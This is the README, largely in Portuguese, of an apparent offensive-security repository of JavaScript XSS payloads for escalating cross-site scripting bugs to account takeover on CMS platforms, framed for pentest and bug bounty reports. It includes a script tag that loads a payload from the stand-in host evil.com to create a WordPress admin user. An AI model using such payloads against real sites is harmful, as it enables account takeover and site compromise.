
XSS payloads designed to turn alert(1) into P1
Payloads XSS projetados para transformar alert(1) em P1.
Este repositório foi lançado juntamente com um post do blog intitulado "How to Upgrade Your XSS Bugs from Medium to Critical" https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4
Neste repositório você encontrará vários arquivos JavaScript que podem ser carregados em um payload de XSS para executar funções sensíveis em plataformas CMS populares no contexto do navegador da vítima. Isso pode ajudar a transformar um simples bug de XSS em algo mais crítico, como uma tomada de conta (account takeover).
Isso é perfeito para aumentar a severidade de um relatório de pentest ou bug bounty ao demonstrar um impacto de segurança real.
Os payloads estão sendo adicionados gradualmente, conforme tenho tempo. Muitos outros virão; se você puder ajudar, pull requests são bem-vindos! Se você está procurando inspiração sobre o que criar, verifique a aba "issues" neste repositório.
A maneira mais simples de usar esses payloads é hospedá-los em algum lugar e carregá-los no atributo src de uma tag script do seu payload de XSS, assim:
<script src="http://evil.com/wordpress_create_admin_user.js"></script>
Alternativamente, dependendo do contexto e do tamanho do payload, às vezes ele pode ser minificado, codificado e então incluído diretamente na requisição.
Para hospedar o arquivo JavaScript, talvez seja necessário definir o Content-Type como application/javascript. Para conseguir isso com PHP, basta adicionar esta linha ao topo de qualquer um dos payloads, salvá-lo como um arquivo .php e hospedá-lo no seu servidor web com PHP:
<?php header("Content-Type: application/javascript"); ?>
Este artigo da Shift8 foi o que me inspirou a criar este repositório. O JS no artigo tem alguns pequenos erros de digitação, mas os conceitos estão corretos.